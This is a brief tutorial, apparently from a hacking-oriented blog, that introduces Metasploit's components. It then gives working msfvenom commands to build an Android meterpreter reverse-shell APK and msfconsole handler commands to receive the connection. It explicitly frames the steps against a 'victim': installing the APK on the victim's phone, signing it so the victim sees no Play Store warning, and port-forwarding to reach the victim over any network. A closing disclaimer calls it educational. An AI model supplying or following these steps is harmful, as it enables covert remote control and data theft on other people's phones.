What Is Metasploit And Payloads
Table of Contents
Introduction
Metasploit is mostly used exploitation framework . Metasploit Framework is set of open source tools that is used for network enummeration , vulnerability scanning , payload making , exploit etc.
Main Components
Auxiliary
It is a supporting module , such as scanner , fuzzers , crawlers etc found here.
Encoders
It is used to encode the exploit and payload to bypass signature based antivirus
Payloads
Payloads is just a code which is run in target system .
Exploits
It provides access to the target system .
Also Read : How To Install Metasploit In Termux
Also Read : How To Install Metasploit In any Linux
Payloads
We generally create two types of payloads :
- Using IP
- Using Portforwarding
Using IP
./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R> /sdcard/payload.apk
You can customize lhost and lport according to your use if you want to use portforwarding then put lhost and lport according to your portforwarding port and lhost.
This apk will save on international storage il, if you want any another location just type the folder name
- Ex:- /sdcard/h4ck3r/…../pd.apk
Using this you will create a payload just install it on victim phone
NOTE : You need to connect hotspot with victim phone “Else it will not work”
Before sending apk to victim don’t forget to sign the apk using any apk , else playstore will give some warning to the victim.
Special : you need to setup portforwarding to access victim over any network
Portmap.io provide free portforwarding but premium portforwarding will work good if you want good connection
Multi Handler
For connection you need setup multi handler
Run metasploit framework first
- cd metasploit-framework
- ./msfconsole
- use exploit/multi/handler
- set payload android/metrpreter/reverse_tcp
- set lhost 127.0.0.1
- set lport 4444
- exploit
After connecting to the device you can use many commands, for the command list you can type “help” to get all the commands.
Google for the command information before executing it may some command wipe the data of their phone or may damage the motherboard
Conclusion
In this article, we will learn about a most advance and power full tool Metasploit which made for security purpose or to find vulnerability. All the information are for educational purposes, we don’t promote any illegal activity .